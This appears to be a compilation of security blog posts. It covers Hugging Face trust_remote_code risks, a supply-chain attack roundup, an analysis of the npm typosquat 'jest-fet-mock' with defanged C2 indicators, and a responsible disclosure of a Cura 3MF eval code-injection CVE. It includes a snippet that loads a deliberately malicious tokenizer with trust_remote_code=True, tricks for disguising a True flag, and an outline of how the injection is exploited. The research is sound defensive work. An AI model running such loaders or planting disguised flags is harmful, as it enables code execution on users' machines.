Beyond hosting models and associated code, Hugging Face is a also maintainer of multiple libraries for interfacing with all this goodness – libraries for uploading, downloading and executing models to the Hugging Face platform. From a security standpoint – this offers a HUGE attack surface to spread malicious content through. On that vast attack surface a lot has already been said and many things have been tested in the Hugging Face ecosystem, but many legacy vulnerabilities persist, and bad security practices still reign supreme in code and documentation; these can bring an organization to its knees (while being practiced by major vendors!) and known issues are shrugged off because “that’s just the way it is” – while new solutions suffer from their own set of problems..

ReadMe.md? More Like “TrustMe.md”

The crux of all potentially dangerous behavior around marketplaces and repositories is trust – trusting the content’s host, trusting the content’s maintainer and trusting that no one is going to pwn either. This is also why environments that allow obscuring malicious code or ways to execute it are often more precarious for defenders.

While downloading things from Hugging Face is trivial, actually using them is finnicky – in that there is no one global definitive way to do so and trying to do it any other way than the one recommended by the vendor will likely end in failure. Figuring out how to use a model always boils down to RTFM – the ReadMe.

But can ReadMe files be trusted? Like all code, there are good and bad practices – even major vendors fall for that. For example, Apple actively uses dangerous flags when instructing users on loading their models:

trust_remote_code sounds like a very reasonable flag to set to True

There are many ways to dangerously introduce code into the process, simply because users are bound to trust what the ReadMe presents to them. They can load malicious code, load malicious models in a manner that is both dangerous and very obscure.

Configuration-Based Code Execution Vectors

Let’s start by examining the above configurations in its natural habitat.

Transformers is one of the many tools Hugging Face provides users with, and its purpose is to normalize the process of loading models, tokenizers and more with the likes of AutoModel and AutoTokenizer. It wraps around many of the aforementioned technologies and mostly does a good job only utilizing secure calls and flags.

However – all of that security goes out the window once code execution for custom models that load as Python code behind a flag, “trust_remote_code=True”, which allows loading classes for models and tokenizers which require additional code and a custom implementation to run.

While it sounds like a terrible practice that should be rarely used, this flag is commonly set to True. Apple was already mentioned, so here’s a Microsoft example:

why wouldn’t you trust remote code from Microsoft? What are they going to do, force install Window 11 on y- uh oh it’s installing Windows 11

Using these configurations with an unsecure model could lead to unfortunate results.

Code loads dangerous config à config loads code module à code loads OS command

Code will attempt to load an AutoModel from a config with the trust_remote_code flag

Config will then attempt to load a custom class model from “exploit.SomeTokenizer” which will import “exploit” first, and then look for “SomeTokenizer” in that module

SomeTokenizer class doesn’t exist but exploit.py has already been loaded, and executing malicious commands

This works for auto-models and auto-tokenizers, and in transformer pipelines:

in this case the model is valid, but the tokenizer is evil. Even easier to hide behind!

Essentially this paves the way to malicious configurations – ones that seem secure but aren’t. There are plenty of ways to hide a True flag looking like a False flag in plain sight:

False is False

{False} is True – it’s a dict

“False” is True – it’s a str

False < 1 – is True, just squeeze it to the side:

This flag is set as trust_remote_code=False……………………………………………………………………………….………….n’t

While these are general parlor tricks to hide True statements that are absolutely not exclusive to any of the code we’ve discussed – hiding a dangerous flag in plain sight is still rather simple. However, the terrible practice by major vendors to have this flag be popular and expected means such trickery might not even be required – it can just be set to True.

Of course, this entire thing can be hosted on Hugging Face – models are uploaded to repos in profiles. Providing the name of the profile and repo will automatically download and unpack the model, only to load arbitrary code.

import transformers

yit = transformers.AutoTokenizer.from_pretrained(“dortucx/unkindtokenizer”, trust_remote_code=True)  

print(yit)

Go on, try it. You know you want to. What’s the worst that can happen? Probably nothing. Right? Nothing whatsoever.

Dangerous Coding Practices in ReadMes

Copy-pasting from ReadMes isn’t just dangerous because they contain configurations in their code, though – ReadMes contain actual code snippets (or whole scripts) to download and run models.

We will discuss many examples of malicious model loading code in subsequent write-ups but to illustrate the point let’s examine the huggingface_hub library, a Hugging Face client. The hub has various methods for loading models automatically from the online hub, such as “huggingface_hub.from_pretrained_keras”. Google uses it in some of its models:

And if it’s good enough for Google, it’s good enough for everybody!

But this exact method also supports dangerous legacy protocols that can execute arbitrary code. For example, here’s a model that is loaded using the exact same method using the huggingface_hub client and running a whoami command:

A TensorFlow model executing a “whoami” command, as one expects!

Conclusions

The Hugging Face ecosystem, like all marketplaces and open-source providers, suffers from issues of trust, and like many of its peers – has a variety of blindspots, weaknesses and practices the empower attackers to easily obscure malicious activity.

There are plenty of things to be aware of – for example if you see the trust_remote_code flag being set to True – tread carefully. Validate the code referenced by the auto configuration.

Another always-true recommendation is to simply avoid untrusted vendors and models. A model configured incorrectly from a trusted model is only trustworthy until that vendor’s account is compromised, but any model from any untrusted vendor is always highly suspect.

As a broader but more thorough methodology, however, a user who wants to securely rely on Hugging Face as a provider should be aware of many things – hidden evals, unsafe model loading frameworks, hidden importers, fishy configuration and many, many more. It’s why one should read the rest of these write-ups on the matter.

On The Next Episode…

Now that we’ve discussed the very basics of setting up a model – we’ve got exploit deep-dives, we’ve got scanner bypasses, and we’ve also got more exploits. Stay tuned.

October 2024 in Software Supply Chain Security

Yehuda Gelb — Tue, 12 Nov 2024 16:02:41 +0000

October 2024 heralded a new chapter in supply chain security challenges, characterized by innovative attack techniques and cryptocurrency-focused threats. A groundbreaking entry point exploitation technique affecting multiple package ecosystems was unveiled, while the NPM ecosystem witnessed the first-ever use of Ethereum smart contracts for malware C2 infrastructure. The month also saw multiple sophisticated attacks on cryptocurrency wallets through PyPI packages and a notable compromise of the popular lottie-player package, despite 2FA protections, highlighting the increasing complexity of supply chain security threats.

Let’s delve into some of the most striking events of October:

This New Supply Chain Attack Technique Can Trojanize All Your CLI Commands

A new supply chain attack technique exploits entry points in various programming ecosystems, allowing attackers to trojanize CLI commands. This stealthy method poses risks to developers and enterprises, bypassing traditional security checks. (Link to report).

With 2FA Enabled: NPM Package lottie-player Taken Over by Attackers

NPM package lottie-player compromised via leaked automation token, bypassing 2FA. Malicious versions injected code to trick users into connecting crypto wallets. Swift response: safe version released, compromised versions unpublished. (Link to report).

Crypto-Stealing Code Lurking in Python Package Dependencies

A sophisticated cyber attack on PyPI targeted cryptocurrency wallets through malicious packages. The attack used deceptive strategies, distributed malicious code across dependencies, and only activated when specific functions were called, making detection challenging. (Link to report).

Cryptocurrency Enthusiasts Targeted in Multi-Vector Supply Chain Attack

A malicious PyPI package “cryptoaitools” targeted cryptocurrency enthusiasts through a multi-vector supply chain attack. It used deceptive GUI, multi-stage infection, and comprehensive data exfiltration to steal crypto-related information from Windows and macOS users. (Link to report).

Supply Chain Attack Using Ethereum Smart Contracts to Distribute Multi-Platform Malware

A sophisticated NPM supply chain attack uses Ethereum smart contracts for C2 distribution. The cross-platform malware, targeting popular testing packages, affects Windows, Linux, and macOS through Typosquatting and preinstall scripts. (Link to report)

* * *

Our team will continue to hunt, squash attacks, and remove malicious packages in our effort to keep the open-source ecosystem safe.

I encourage you to stay up to date with the latest trends and tactics in software supply chain security by tuning into our future posts and learning how to defend against potential threats.

Stay tuned…

Working to Keep the Open Source Ecosystem Safe

Supply Chain Attack Using Ethereum Smart Contracts to Distribute Multi-Platform Malware

Yehuda Gelb — Mon, 04 Nov 2024 09:47:48 +0000

As part of our ongoing security efforts, we continuously monitor and detect malicious packages within various software ecosystems. Recently, we uncovered a unique supply chain attack through the NPM package “jest-fet-mock,” which implements a different approach using Ethereum smart contracts for command-and-control operations. The package masquerades as a popular testing utility while distributing malware across Windows, Linux, and macOS platforms. This discovery represents a notable difference in supply chain attack methodologies, combining blockchain technology with traditional attack vectors in a way not previously observed in npm. jest-fet-mock was the first package identified in a larger ongoing campaign targeting the npm ecosystem. Additional packages connected to this campaign were later reported by security firms Phylum and Socket.

Key Findings

First observed instance of malware utilizing Ethereum smart contracts for C2 server address distribution in the NPM ecosystem.
Typosquatting attack targeting developers by impersonating two legitimate, popular testing packages.
Cross-platform malware targeting Windows, Linux, and macOS development environments.
Uses NPM preinstall scripts to execute malicious code during package installation.
Performs info-stealing actions while establishing persistence mechanisms across infected systems.

The Art of Impersonation

The malicious package “jest-fet-mock”, published in mid-October, was designed to impersonate two legitimate and widely used JavaScript testing utilities.

The first, “fetch-mock-jest” (~200K weekly downloads), is a wrapper around fetch-mock that enables HTTP request mocking in Jest environments.

The second, “Jest-Fetch-Mock” (~1.3M weekly downloads), provides similar functionality through Jest’s native mocking capabilities.

Both legitimate packages are tools for testing HTTP requests in JavaScript applications. The attacker used a classic typosquatting technique by misspelling “fetch” as “fet” while maintaining the key terms “jest” and “mock”. Given that the legitimate packages are primarily used in development environments where developers typically have elevated system privileges, and are often integrated into CI/CD pipelines, we believe this attack specifically targets development infrastructure through the compromise of testing environments.

Attack Flow

Blockchain-Based Command & Control

Etherscan transaction details showing the smart contract’s getString method returning the C2 server address

The most distinctive aspect of this attack is how it leverages the Ethereum blockchain for its command-and-control infrastructure. When executed, the malware interacts with a smart contract at address “0xa1b40044EBc2794f207D45143Bd82a1B86156c6b“. Specifically, it calls the contract’s “getString” method, passing “0x52221c293a21D8CA7AFD01Ac6bFAC7175D590A84” as a parameter to retrieve its C2 server address.

By using the blockchain in this way, the attackers gain two key advantages: their infrastructure becomes virtually impossible to take down due to the blockchain’s immutable nature, and the decentralized architecture makes it extremely difficult to block these communications.

Understanding the Smart Contract Mechanism

Think of a smart contract on the Ethereum blockchain as a public bulletin board – anyone can read what’s posted, but only the owner has the ability to update it. The attackers in this case deployed such a contract, using it to store their C2 server address. Every time the malicious package is installed on a new system, it checks this bulletin board to find out where to download the actual malware. What makes this approach particularly effective is its flexibility. Instead of hardcoding server addresses in their malware, the attackers can simply update their smart contract whenever they need to point to a new server. This means that even if defenders successfully block one C2 server, the attackers can quickly switch to a new one by updating their contract, and all new infections will automatically connect to the new location.

Initial Execution

The attack chain begins during the npm package installation process through the preinstall script. This script determines the host operating system and constructs a platform-specific URL to download the appropriate payload. The malware then spawns a detached process, ensuring the malicious code continues running independently of the installation process.

Multi-Platform Malware

Our analysis revealed distinct malware variants designed for:

Windows (SHA-256: df67a118cacf68ffe5610e8acddbe38db9fb702b473c941f4ea0320943ef32ba),

Linux (SHA-256: 0801b24d2708b3f6195c8156d3661c027d678f5be064906db4fefe74e1a74b17),

and macOS (SHA-256: 3f4445eaf22cf236b5aeff5a5c24bf6dbc4c25dc926239b8732b351b09698653).

Notably, as of this writing, none of these files have been flagged as malicious by any security vendors on VirusTotal.

The malware variants demonstrated various capabilities including system reconnaissance, credential theft, and establishing persistence through platform-specific mechanisms – using AutoStart files in Linux and Launch Agent configuration (~/Library/LaunchAgents/com.user.startup.plist) in macOS.

Throughout their operation, all variants maintain consistent communication with the attacker’s C2 server, showcasing a coordinated cross-platform attack strategy aimed at compromising development environments.

Impact

By targeting development tools and testing utilities, attackers gain potential access to not only individual developer machines but also CI/CD pipelines and build systems. The use of blockchain technology for C2 infrastructure represents a different approach to supply chain attacks in the npm ecosystem, making the attack infrastructure more resilient to takedown attempts while complicating detection efforts.

The cross-platform nature of the malware, coupled with the fact that no security vendors have flagged these files as malicious on VirusTotal at the time of writing, makes this an actively dangerous threat to development environments.

Conclusion

The discovery of “jest-fet-mock” reveals how threat actors are finding different ways to compromise the software supply chain. This case serves as an important reminder for development teams to implement strict security controls around package management and carefully verify the authenticity of testing utilities, especially those requiring elevated privileges.

This campaign is ongoing, with additional packages connected to the same campaign reported later in the month by Phylum and Socket.

Packages

For the full list of packages related to this campaign see this link:

https://gist.github.com/masteryoda101/d4e90eb8004804d062bc04cf1aec4bc0

IOCs

hxxp[:]//193[.]233[.]201[.]21:3001
hxxp[:]//193[.]233[.]201[.]21:3001/node-win.exe
hxxp[:]//193[.]233[.]201[.]21:3001/node-linux
hxxp[:]//193[.]233[.]201[.]21:3001/node-macos
df67a118cacf68ffe5610e8acddbe38db9fb702b473c941f4ea0320943ef32ba
0801b24d2708b3f6195c8156d3661c027d678f5be064906db4fefe74e1a74b17
3f4445eaf22cf236b5aeff5a5c24bf6dbc4c25dc926239b8732b351b09698653

Pwn3D: Abusing 3D Models for Code Execution

Ori Ron — Mon, 04 Nov 2024 09:44:47 +0000

Preface

Back in 2016, I was a passionate mechanical engineering student. Though I never graduated and eventually pivoted into AppSec, my love for engineering never faded. Fast forward to 2023, I bought a 3D printer – playing around with mechanics again. Naturally, I began merging this hobby with my security background, leading me to seek out vulnerabilities in 3D printing software.

During one of our in-company white hat hacking activities, I took the opportunity to examine several 3D printing open source products. One of them was UltiMaker Cura, a popular slicer that according to UltiMaker’s website is trusted by millions (more on slicers soon). After scanning Cura with Checkmarx SAST, I uncovered a potential lead for code injection vulnerability, now tracked as CVE-2024-8374.

In this blog post, we’ll examine the vulnerable flow and exploitation of CVE-2024-8374. We’ll also share insights into the impact of such vulnerabilities on the open source 3D printing community. Finally, we’ll highlight key takeaways from UltiMaker’s excellent response.

Introduction

Slicers

First things first, what exactly is a slicer?

Simply put, a slicer is a program that is responsible for transforming a 3D model into a set of instructions (i.e. a gcode file) that the 3D printer can follow to physically print the model.

Slicing is a vital part of the 3D printing process, and it cannot be skipped. As the name suggests, the slicer divides the 3D model into layers and provides a set of instructions for each one, such as temperature, speed, and more. The printer then processes these instructions, layer by layer, when printing.

A typical flow of printing a 3D model is:

Obtaining a model (e.g., download from a public model database or design it yourself)

Slicing the model (e.g., with UltiMaker Cura)

Hit PRINT

Enjoy the 3D print

3D Models Formats

Before diving into Cura’s source code, we need to take a step back and first discuss the file formats used in 3D printing. There are different 3D models formats, each with different properties and purposes.

The most popular format for 3D printing is called STL. Another popular format is the 3MF that is essentially a ZIP archive with the `.3mf`extension holding the model data in XML along with a collection of metadata files.

The popularity of 3MF is rapidly growing because it adds capabilities that the well-known STL format doesn’t provide, such as color printing. It’s also gained popularity because it is backed by industry leaders including Autodesk and Dassault Systèmes. All of these make it one of the most widely used formats for 3D printing.

Most importantly, it serves as our payload entry point.

The Vulnerability

Our journey to Cura’s source code starts in the `_read` method of the `3MFReader.py` plugin, which is responsible for loading 3MF models into Cura before slicing.

Let’s start by examining this method (the important lines are highlighted in yellow):

The function accepts a `file_name` parameter, which is the path to the 3MF model we want to slice (line of code).

The 3MF model is then parsed by a ZIP reader (as mentioned earlier, a 3MF file is a ZIP archive) (line of code).

The file `3dmodel.model` is read from the archive. This file contains the actual model data in the XML format. Note that Cura stores this information in a variable called `scene_3mf` (line of code).

Transforming each node from our 3MF file into an UltiMaker format. Note that the `node` is passed in the first parameter of `_convertSavitarNodeToUMNode` (line of code).

Examining the flow further, we can move forward to `_convertSavitarNodeToUMNode`. This function is quite long, and most of it is not relevant to us, so we’ll only focus on the specific lines which our input flows to:

The `node` variable passed by the `_read` function is now called `savitar_node` inside the function `_convertSavitarNodeToUMNode` (line of code)

Settings are extracted from the `savitar_node` (line of code)

If `settings` is defined, Cura tries to add them (line of code)

While iterating each setting, Cura may find that the `drop_to_buildplate` is defined (line of code)

Once that happens, the value of this setting will end up in a call to `eval` which results in code execution (line of code).

Exploitation

By now it seems that we have a weakness because we didn’t see any kind of sanitization in the execution flow.

To exploit it, we need to verify that we can control the `drop_to_buildplate` property and, if so, to understand the valid XML structure in which we can place the payload.

Searching for known information about the 3MF format didn’t reveal much about the `drop_to_buildplate` property. However, it looked like this is a feature that is specific to Cura and not used by other slicers, which makes finding this setting in publicly available models quite challenging. Guessing the correct XML format also doesn’t seem to be the best approach in this case. Another alternative is to dive deeper into the source code to learn the appropriate format for setting Cura configurations. But fortunately, I found an easier way:

Since we know that this property is unique to Cura, we may be able to use it to create a valid XML model that contains the `drop_to_buildplate` property for the payload.

Let’s try that by downloading any 3MF model from a public model database. Note that we don’t care about anything else but the format (.3mf) of the file. For example, in the image below you can see that the specific model that I downloaded was created by OnShape (line #9), which is a 3D design software, but soon this metadata will be overridden.

Now, let’s load this 3MF file into Cura and export it back to a 3MF format. The metadata will be converted to the format used by Cura.

Extracting `3dmodel.model` from the 3MF archive we have just exported confirms our success, revealing a valid 3MF model with Cura’s metadata, including the `drop_to_buildplate` property (line #6):

Let’s replace the value of `drop_to_buildplate` with Python code that spawns a calculator:

The only thing left to do now is to open our crafted model with Cura-

Let’s highlight a few things about the exploitation:

The code is executed with the default Cura configuration.

The code runs immediately, even before the model is loaded. There’s no need to slice or perform any action in Cura.

The model remains completely valid after tampering, making it appear legitimate from the user’s perspective.

The only way to identify this model as malicious is by examining the XML data.

This allows a malicious actor to easily download, modify, and redistribute popular models for exploitation.

But that’s not all – yet.

A Note About Supply Chain Attacks

We know already that this vulnerability is quite simple to exploit. Additionally, beyond model databases like Printables and Thingiverse, which are popular among makers and hobbyists, there are also open source repositories for engineering-focused projects, often used by sensitive sectors such as national security contractors, healthcare engineers, and others. The engineers use basic models in several ways, such as building blocks for their own designs or testing purposes. The open source nature of the 3D printing industry makes such vulnerabilities a potential target for supply chain attacks.

The Fix

The fix is straightforward: the maintainers removed the unnecessary eval call and replaced it with strict Boolean parsing, as shown here:

Removing eval

Boolean parsing

Another thing to note is that UltiMaker didn’t reveal any information about the vulnerability in their commit’s comment:

This is important because malicious actors frequently scan GitHub for vulnerabilities that were fixed but not yet released.

UltiMaker’s Response

UltiMaker responded and acted quickly, implementing a fix within less than 24 hours. The fix was released in the next beta release `5.8.0-beta.1` on 16 Jul. UltiMkaer’s security team was very responsive and gave all the required information for a smooth disclosure process.

All in all, working with UltiMaker to address this issue was a great experience, and they’ve certainly earned Checkmarx’s Seal of Approval.

References

3D Models – Clean 3MF Model & PoC for Code Execution

NVD CVE Database

Commit of the fix

CWE 94 – Code Injection

Timeline

15 June 2024 – Initial contact made with the UltiMaker’s Security team via security@ultimaker.com, providing a comprehensive report on the vulnerability.

16 June 2024 – UltiMaker responded, confirming the vulnerability. A fix was subsequently implemented and committed on the same day.

16 July 2024 – Version 5.8.0-beta.1, containing the fix, was released.

1 August 2024 – Stable version 5.8.0, containing the fix, was released.

3 September 2024 – CVE number assigned.